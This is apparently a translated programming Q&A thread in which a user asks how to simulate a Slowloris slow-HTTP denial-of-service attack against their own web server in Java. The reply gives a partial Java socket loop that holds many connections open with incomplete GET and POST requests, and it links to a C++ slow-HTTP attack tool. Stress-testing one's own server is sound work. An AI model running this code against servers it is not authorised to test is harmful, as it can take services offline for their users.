我需要编写 java 代码测试来模拟我的 Web 服务器上的 Slowloris HTTP DoS 攻击。我找到了一个执行此操作的 perl 代码:http: //ha.ckers.org/slowloris/
我的环境不是固定的,这意味着我不能保证在机器上安装了 active-perl。还有另一种方法吗?有没有办法使用 jerl ( https://code.google.com/p/jerl/ ) 来做到这一点而无需安装 active-perl (也许我可以将所需的库添加到我的 java 项目中?)?
switch (dosMethod) {
case GET:
while(!StopWorking)
{
for(int i=0;i<per_Thread;i++)
{
if(socks[i].isConnected())
{
try
{
PrintWriter pw = new PrintWriter(socks[i].getOutputStream());
pw.println("GET / HTTP/1.1");
pw.println("Host: " + hp.getHostText());
pw.println();
pw.flush();
}
catch (Exception e){}
}
else
{
try {
socks[i] = new Socket(InetAddress.getByName(hp.getHostText()), hp.getPort());
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
break;
case POST:
for(int i=0;i<per_Thread;i++)
{
try {
socks[i].close();
} catch (IOException e) {
e.printStackTrace();
}
}
while(!StopWorking)
{
for(int i=0;i<per_Thread;i++)
{
if(socks[i].isConnected())
{
try {
PrintWriter pw = new PrintWriter(socks[i].getOutputStream());
pw.println();
} catch (IOException e) {
e.printStackTrace();
}
}
else
{
try {
socks[i] = new Socket(InetAddress.getByName(hp.getHostText()), hp.getPort());
PrintWriter pw = new PrintWriter(socks[i].getOutputStream());
pw.println("POST / HTTP/1.1");
pw.println("User-Agent: %s");
pw.println("Connection: keep-alive");
pw.println("Keep-Alive: 900");
pw.println("Content-Length: 10000");
pw.println("Content-Type: application/x-www-form-urlencoded");
pw.println();
pw.flush();
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
break;
}
其中 socks 是一个套接字数组 (Socket[] socks = new Socket[connsperthread];
您可以使用用 C++ 编写的这个实现https://community.quallys.com/blogs/securitylabs/2011/08/25/new-open-source-tool-for-slow-http-attack-vulnerabilities